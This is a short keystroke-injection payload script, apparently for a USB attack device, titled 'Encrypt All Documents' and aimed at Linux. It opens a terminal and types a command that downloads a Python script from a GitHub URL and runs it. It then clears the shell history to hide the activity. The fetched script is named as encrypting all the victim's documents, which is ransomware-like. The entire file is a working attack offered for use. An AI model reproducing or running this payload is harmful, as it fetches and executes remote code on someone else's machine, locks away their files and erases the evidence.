REM ########################################
REM #                                      |
REM # Title        : Encrypt All Documents |
REM # Author       : Zenin                 |
REM # Version      : 1.0                   |
REM # Category     : Execution             |
REM # Target       : Linux                 |
REM #                                      |
REM ########################################

DELAY 1000
CTRL-ALT t
DELAY 2000

STRING curl https://raw.githubusercontent.com/Zenin0/Glipper_Scripts/main/Linux/Execution/EncryptAllDocuments_Linux/EncryptAllDocumentsScript.py > script.py && python3 script.py; history -c; exit;
ENTER
